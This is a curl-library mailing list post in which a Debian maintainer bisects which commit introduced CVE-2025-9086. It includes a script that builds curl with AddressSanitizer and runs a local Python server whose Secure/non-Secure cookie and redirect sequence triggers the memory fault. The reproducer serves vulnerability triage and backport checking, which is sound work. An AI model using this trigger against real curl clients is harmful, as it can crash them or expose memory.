Hello curl friends, I was investigating CVE-2025-9086 for Debian, trying to run the POC against our older releases together with Alex and could not run it against 7.88.1, even though it was supposedly introduced in 7.31.0 as per https://curl.se/docs/CVE-2025-9086.html.
Running a git bisect on the upstream project [0], I've landed on the following commit as introducing the ASAN failure: https://github.com/curl/curl/commit/1aea05a6c2699e80c75936d58569851555acd603 I understand not triggering the ASAN finding doesn't necessarily means the issue didn't exist, so I wanted to ask for upstream help here, do you believe that could be the correct breaking commit, rather than https://github.com/curl/curl/commit/f24dc09d209a2f91ca38d? I'm cc'ing Alex, who backported the fix for Debian and who noticed the POC didn't run for our older releases, and also Charles, who helped us release an advisory for one of the older Debian releases (we might have released an advisory which wasn't needed). The bisect script I used is at the bottom of this email [0], but note that in order to run it, you will need to map your hostname to 127.0.0.1 in /etc/hosts if it's not already there. Cheers, [0] ```bash #!/bin/bash untestable() { git_clean exit 125 } fail() { git_clean exit 1 } git_clean() { git reset --hard git clean -d -x -f > /dev/null set +x } set -x autoreconf -i export CFLAGS=-fsanitize=address -g -fno-omit-frame-pointer -O1 export LDFLAGS=-fsanitize=address export LIBS=-lasan ./configure --with-nghttp2 \ --with-openssl \ --with-ca-path=/etc/ssl/certs \ --with-ca-bundle=/etc/ssl/certs/ca-certificates.crt \ --prefix $HOME/curl/install \ --includedir=/usr/include/x86_64-linux-gnu \ || untestable make -j || untestable openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 1 -nodes -subj "/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNa meOrHostname" cat << EOF > server.py #! /usr/bin/python3 from http.server import BaseHTTPRequestHandler, HTTPServer import socket import ssl import threading import time class HTTPSRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(302) self.send_header("Set-Cookie", "A=B; path=/; Secure") self.send_header("Location", f"http://{socket.gethostname()}:9080") self.end_headers() class HTTPRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header("Set-Cookie", "A=C; path=/foo/") self.end_headers() self.wfile.write(b"A" * 128) def run_https_server(): httpd = HTTPServer(('', 9443), HTTPSRequestHandler) ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) ctx.load_cert_chain(certfile='./cert.pem', keyfile="./key.pem") httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True) httpd.serve_forever() def run_http_server(): httpd = HTTPServer(('', 9080), HTTPRequestHandler) httpd.serve_forever() if __name__ == "__main__": https_thread = threading.Thread(target=run_https_server) http_thread = threading.Thread(target=run_http_server) https_thread.start() http_thread.start() while True: time.sleep(1) EOF python3 server.py & SERVER_PID=$! sleep 1 export ASAN_OPTIONS=exitcode=42 ./src/curl --insecure -c cookies -vv -L "https://${HOSTNAME}:9443"; CURL_EXIT_CODE="$?" kill "$SERVER_PID" echo "CURL EXIT CODE: $CURL_EXIT_CODE" if [ "$CURL_EXIT_CODE" -eq 42 ]; then fail fi # If we got here, success. set +x git reset --hard exit 0 ``` -- Samuel Henrique <samueloph> -- Unsubscribe: https://lists.haxx.se/mailman/listinfo/curl-library Etiquette: https://curl.se/mail/etiquette.html
